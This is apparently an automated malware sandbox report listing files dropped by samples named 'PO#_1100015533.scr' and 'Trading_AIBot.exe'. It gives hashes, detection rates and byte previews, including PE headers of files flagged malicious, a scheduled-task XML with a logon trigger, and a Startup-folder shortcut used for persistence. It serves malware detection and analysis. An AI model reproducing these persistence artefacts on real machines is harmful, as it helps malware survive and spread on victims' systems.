                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\c4ddqhk1.r3p.ps1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\mmq5rtk3.bzo.ps1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\nyzzhnxx.l5d.ps1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\q333reke.quz.psm1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\rdmii3k4.rew.psm1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\s5v4hfqw.z3v.psm1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tl5wgntj.pam.ps1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmp2972.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1574
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1060180200266325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtTxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTNv
                                                                                                                                                                                                                                                                        MD5:E78CCC54D839A8B32AE78CFDEA804A8F
                                                                                                                                                                                                                                                                        SHA1:69FFE457E4E27637BCCA55544403C0C01FF02385
                                                                                                                                                                                                                                                                        SHA-256:A9B810600BEF3FA157AFE27F3F86A71D90398FD6177AD9AFBFAE7058F81E3E71
                                                                                                                                                                                                                                                                        SHA-512:183DDD5D96DF948BDAE497C73824F224B208FB01A5B77E5FC010FF90BD175BDB58D6275A1B5C1BF30F973D6BCC68262A5EDD96E7BDCA37FF16D0C4BDD0BACFDC
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):1574
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1060180200266325
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtTxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTNv
                                                                                                                                                                                                                                                                        MD5:E78CCC54D839A8B32AE78CFDEA804A8F
                                                                                                                                                                                                                                                                        SHA1:69FFE457E4E27637BCCA55544403C0C01FF02385
                                                                                                                                                                                                                                                                        SHA-256:A9B810600BEF3FA157AFE27F3F86A71D90398FD6177AD9AFBFAE7058F81E3E71
                                                                                                                                                                                                                                                                        SHA-512:183DDD5D96DF948BDAE497C73824F224B208FB01A5B77E5FC010FF90BD175BDB58D6275A1B5C1BF30F973D6BCC68262A5EDD96E7BDCA37FF16D0C4BDD0BACFDC
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\z3smmtjz.rrd.psm1

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1
                                                                                                                                                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:1

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\68573a154f49b6de.bin

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):12320
                                                                                                                                                                                                                                                                        Entropy (8bit):7.985584320131843
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:jzqgh4N7Jc2pn7XdC7HLea3lsbYcS5BVpwDa5YMRZlOmQLpt/n:j2gMh7tQaaZ5BTwDaqMRHOmQ9p
                                                                                                                                                                                                                                                                        MD5:6E73D95A5D489C665AB4737A818869B6
                                                                                                                                                                                                                                                                        SHA1:521AF798192260CFC22A9ECE9D78B12F534DE725
                                                                                                                                                                                                                                                                        SHA-256:A53AD1147860088E28F0B7C7D46ADF3A31C304E107658AA9A7A83A9AFC03E09D
                                                                                                                                                                                                                                                                        SHA-512:5DF53F5D1E3FCEDBB71DB8AD56EAFEC1F87661CB33043543AAF05574ABC8E837793BA1B528FAFEE1C9189BD04BC3D0D75371673D78D78F9DFD6F3943A18D3559
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:.....H|..Fy}.M>..7.=...P....D...r.a.."..&F.f-..XPOg....iD.,.....f...-8....mL.b1.A..|.*s.}G.Wc...D....,dw.C.. .u^A..kCa"rK?..]&.[......b..y......m..:.t.".~C}.i$;....}<LL|+...j..P}......1.D.A....7.qS.&b.B...|CI....y.q./....j.JcG.".9?0.v.6...>)3}T..]......X'.G..|.p...j..M..C6_..O.wA...r..Z.=.Cfq...."r<.Vk....b.....-;...O...D..e....WN;2..K0:{..^.\..82.t..@i..=...].}.'.\O........*...._....uu...._..RY......0.r".E...W%........JN.O.kO.._3,..(.T.E..0...b.2...X..B..Z..H+...B...pF)...0.N....G.j8.<....m^..S|J..b....X..C..jW..%..ru..b#..S..D..G...M..<..,.........a'J..g.2...1JW.D.E...v.bZ..7...........(.N.~_...../l=.p..t...]Z1....J.....rVx..%ic..n. '.va~...L....$;..1....!...I..8_..:...'..V.!:Iq.e...V.=~...lK'L.....M.'_..zw@.(...P...*i]'yt..!...mo....G..S..^..C.a.".F....hj...x&....oVF...Y...,....15......V......N/.*.pHi6.9*uG..f...8.Yw..4..=r.w.O..%C.@d;9....S...g%......p.... ..a..;..F..i.c..P...\...W.![..tL.mW.y.@)...z..9.o.MU....;y...b.d..>.e.

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):665670656
                                                                                                                                                                                                                                                                        Entropy (8bit):7.999999365004637
                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                        SSDEEP:
                                                                                                                                                                                                                                                                        MD5:46981F20592CA1EB36C2C21E396551EC
                                                                                                                                                                                                                                                                        SHA1:B69BC78919358BF2B5AEF2BF4CB20E13147B6291
                                                                                                                                                                                                                                                                        SHA-256:A4A9235B90C29FA3A4A5E48E1CBCDF176408FB91D03F38FD67FA51FD820978C6
                                                                                                                                                                                                                                                                        SHA-512:10B0551E36C2D48299861B376329B54B3D45948A28F83BD43EF85E87563FE83E583D5614727936CC082417AF9BB0F2584FB425762507221197FF90D9DC4AE4D4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Wed Jan 15 10:57:10 2025, mtime=Wed Jan 15 10:57:10 2025, atime=Wed Jan 15 10:57:10 2025, length=70656, window=
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1789
                                                                                                                                                                                                                                                                        Entropy (8bit):3.4362169800747995
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:8jzW8Ecp2wzn/IG9BqR+O4ZvPqRVO1Mqj7U:8nW8110R+ZXqRynU
                                                                                                                                                                                                                                                                        MD5:BAF8BE60BC8DF22D90BB7D8062DF2EA0
                                                                                                                                                                                                                                                                        SHA1:A262A089B977AA89D634A2E51064E9705DC9D47A
                                                                                                                                                                                                                                                                        SHA-256:876E68FAD523347100CDFF4DCCEDBA6D31A96B4A40530E157879000A0E6767AD
                                                                                                                                                                                                                                                                        SHA-512:B8859AF2D8E7E3593806B1EE92C1816B0AE752815A1BA1D6F0560A8208099023A8227C1F9FFF9517CFD49DB1DBCB1CD9FFA2D7160B7275884AD34484D004F75F
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:L..................F.@.. .....Dg.....Dg.....Dg...............................DG..Yr?.D..U..k0.~.t...CFSF..1.....QK.X. AppData...t.Y^...H.g.3..(.....gVA.G..k...<......QK.XQK.X*....=....,...............A.p.p.D.a.t.a...B.R.1...../Z%_. Roaming.<......QK.X/Z%_*....=....6...............R.o.a.m.i.n.g.....P.1...../Z&_. ACCApi..:....../Z%_/Z&_*.........................A.C.C.A.p.i.....^.2...../Z&_ apihost.exe.D....../Z&_/Z&_*.........................a.p.i.h.o.s.t...e.x.e.......................-...8...[............:Wh.....C:\Users\..#...................\\618321\Users.user\AppData\Roaming\ACCApi\apihost.exe...A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.3.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe..............................................................................................................................................

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\hVVSnrrP.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1538560
                                                                                                                                                                                                                                                                        Entropy (8bit):7.867365277392532
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24576:rbJN+UVsa/olfwDPFB1Oj4eg9CQA1S092Txy0QEII2vWmexiq4VzGQ1IZTlNdSwq:X3+UfWwDPfkGCRUTs0QEI6TxiqCGKoF0
                                                                                                                                                                                                                                                                        MD5:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        SHA1:82379E0B59F9A08C7196897A09BE3AE859EC498A
                                                                                                                                                                                                                                                                        SHA-256:6F9D6AB9FCCD1087337ED8328407E5918BD3E2CDDEF4E4C4B56B067E956AC0D2
                                                                                                                                                                                                                                                                        SHA-512:FC705A48E8FA764160CD021F25E0DDE73FCBBEEBF0CFFFBE572317C163CD0946A39A4D6C075D39E5DCBEDBF86C74BED978534004C3B4A1B66E311752AA102BBD
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..g..............0..b..........*.... ........@.. ....................................@.....................................O.......l............................................................................ ............... ..H............text...@`... ...b.................. ..`.rsrc...l............d..............@..@.reloc...............x..............@..B........................H........a...N..............8............................................0..P............(....(..........s ...%s....o!....%s....o!....%s....o!....%s....o!.........*.0..\........~....r...po"....s#.....~....o$....+..o%.......o.......o....-....,..o......~....r;..po"....*......#..@......".(&....*....0..E........('.....((....s=...().....(*...rw..po+....s....(...........o,.......*............8.......0...........~....r...p.o-...o.....r...p.o-...r...p(/...s'......o)......o.....8.....

                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\hVVSnrrP.exe:Zone.Identifier

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                                                        C:\Windows\DtcInstall.log

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):393
                                                                                                                                                                                                                                                                        Entropy (8bit):5.068361882908193
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:tFysXwBRVmWnG3FysXwDUmWnWD3FysXwP5/W8I:tFy4wVmWnG3Fy4womWny3Fy4wh//I
                                                                                                                                                                                                                                                                        MD5:6BDE1F7A58EDDDE27AFC3768DB61D82E
                                                                                                                                                                                                                                                                        SHA1:F1CD84CFC24F75C85AE056AE0907B92F8B5CA82C
                                                                                                                                                                                                                                                                        SHA-256:2A0943B18110F4344A2C4312EEC4712E47E2A02987F672CC704980E44811B8D2
                                                                                                                                                                                                                                                                        SHA-512:E6AA0B1C51FFF01B56954076AC6EC8EFEB0F9DB6C60E7F93223D824C790D80EDD31707AF0C184F4C500F7BF25BD32E3C6F053D1AAB85C383AE784A7320A735D6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:01-15-2025 06:57 : DTC Install error = 0, going to do CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1101) ..01-15-2025 06:57 : DTC Install error = 0, successfully done CreateMutexW, d:\w7rtm\com\complus\dtc\shared\util\security.cpp (1141) ..01-15-2025 06:57 : DTC Install error = 0, IN CILogWriteAsynch::Init, d:\w7rtm\com\complus\dtc\dtc\log\logmgr\src\ilgwrta.cpp (173) ..

                                                                                                                                                                                                                                                                        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1212416
                                                                                                                                                                                                                                                                        Entropy (8bit):5.144440264190482
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:HJz2DWUyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:pz2DWXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:3D8ACDF76F489584D14AAD10E91C4B81
                                                                                                                                                                                                                                                                        SHA1:DA25EEF59F5F994EDE2F89B63A4F79DD9FF7CE2C
                                                                                                                                                                                                                                                                        SHA-256:3586E051248F7CE1F755C39B5D0289A55701015B1A9A7FACFBCE3A11BC719CE3
                                                                                                                                                                                                                                                                        SHA-512:443FF82732205F0AAA17E835D4964FF4A2E6CEE6099DCA39E79E672EC6DA16A3E61102F3B7FF08D4ABD6DBB1841CBC0ABE1793E285E5C43E0AF8E98363716967
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
